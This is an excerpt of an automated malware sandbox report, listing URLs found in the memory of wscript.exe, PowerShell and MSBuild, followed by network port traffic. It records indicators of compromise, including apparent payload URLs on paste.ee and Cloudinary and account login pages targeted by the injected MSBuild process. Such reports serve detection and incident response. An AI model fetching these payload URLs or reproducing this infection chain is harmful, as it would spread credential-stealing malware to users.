                          Source: powershell.exe, 00000001.00000002.1968637783.0000014909FB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                          Source: wscript.exe, 00000000.00000003.1712357297.0000013A577F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1714514420.0000013A599C5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1968637783.000001490A1D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
                          Source: wscript.exe, 00000000.00000003.1712357297.0000013A577F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1714514420.0000013A599C5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1968637783.000001490A1D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
                          Source: wscript.exe, 00000000.00000003.1712357297.0000013A577F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1714514420.0000013A599C5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1968637783.000001490A1D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
                          Source: wscript.exe, 00000000.00000003.1712357297.0000013A577F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1714514420.0000013A599C5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1968637783.000001490A1D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpX
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Fr
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Fr
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFD
                          Source: wscript.exe, 00000000.00000003.1712357297.0000013A577F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1714514420.0000013A599C5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1968637783.000001490A1D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
                          Source: wscript.exe, 00000000.00000003.1712357297.0000013A577F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1714514420.0000013A599C5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1968637783.000001490A1D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?99bdaa7641aea1439604d0afe8971477
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?bc7d158a1b0c0bcddb88a222b6122bda
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950c
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?4be9f57fdbd89d63c136fa90032d1d91
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?e5772e13592c9d33c9159aed24f891a7
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?a6aceac28fb5ae421a73cab7cdd76bd8
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?b57fe5cd49060a950d25a1d237496815
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?2f6c563d6db8702d4f61cfc28e14d6ba
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?3dacce210479f0b4d47ed33c21160712
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?7e0e9c3a9f02f17275e789accf11532b
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?81f59f7d566abbd2077a5b6cdfd04c7b
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?3c5bdbf226e2549812723f51b8fe2023
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?c50299ad5b45bb3d4c7a57024998a291
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
                          Source: powershell.exe, 00000001.00000002.1968637783.000001490A1D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-ae
                          Source: MSBuild.exeString found in binary or memory: https://login.yahoo.com/config/login
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_sKiljltKC1Ne_Y3fl1HuHQ2.css
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_BxKM4IRLudkIao5qo
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_AI1nyU_u3YQ_at1fSBm4Uw2.js
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://maps.windows.com/windows-app-web-link
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=27ff908e89d7b6264fde
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=586ba6
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=7ccb04
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=b1ed69
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816d
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbad
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135
                          Source: wscript.exe, 00000000.00000003.1713716342.0000013A577BC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1712890130.0000013A577BC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1712418235.0000013A577BC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1714215563.0000013A577BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/:
                          Source: wscript.exe, 00000000.00000002.1714264893.0000013A577E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1712357297.0000013A577DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1713716342.0000013A577BC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1712890130.0000013A577BC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1712572682.0000013A577E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1712418235.0000013A577BC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1714215563.0000013A577BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/GXRLA
                          Source: wscript.exe, 00000000.00000003.1713716342.0000013A577BC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1712890130.0000013A577BC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1712418235.0000013A577BC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1714215563.0000013A577BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee:443/d/GXRLAzW:
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-0debb885be07c402c948.js
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ec3581b6c9e6e9985aa7.chunk.v7.js
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.6c288f9aff9797959103.chunk.v7.js
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.9ba2d4c9e339ba497e10.chunk.v7.js
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-1652fd8b358d589e6ec0.js
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.52c45571d19ede0a7005.chunk.v7.j
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.d918c7fc33e22b41b936.chunk.v7.c
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
                          Source: powershell.exe, 00000001.00000002.1968637783.000001490A1D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com
                          Source: powershell.exe, 00000001.00000002.1968637783.000001490A1D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg
                          Source: powershell.exe, 00000001.00000002.1968637783.000001490A1D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgX
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51
                          Source: wscript.exe, 00000000.00000003.1712357297.0000013A577F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1714514420.0000013A599C5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1968637783.000001490A1D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59
                          Source: wscript.exe, 00000000.00000003.1712357297.0000013A577F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1714514420.0000013A599C5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1968637783.000001490A1D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://www.digicert.com/CPS0
                          Source: wscript.exe, 00000000.00000003.1712357297.0000013A577F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1714514420.0000013A599C5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1968637783.000001490A1D2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 0000000B.00000002.2065327512.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                          Source: MSBuild.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                          Source: wscript.exe, 00000000.00000003.1712357297.0000013A577F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1714514420.0000013A599C5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1968637783.000001490A1D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
                          Source: wscript.exe, 00000000.00000003.1712357297.0000013A577F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1714514420.0000013A599C5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1968637783.000001490A1D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://www.office.com/
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
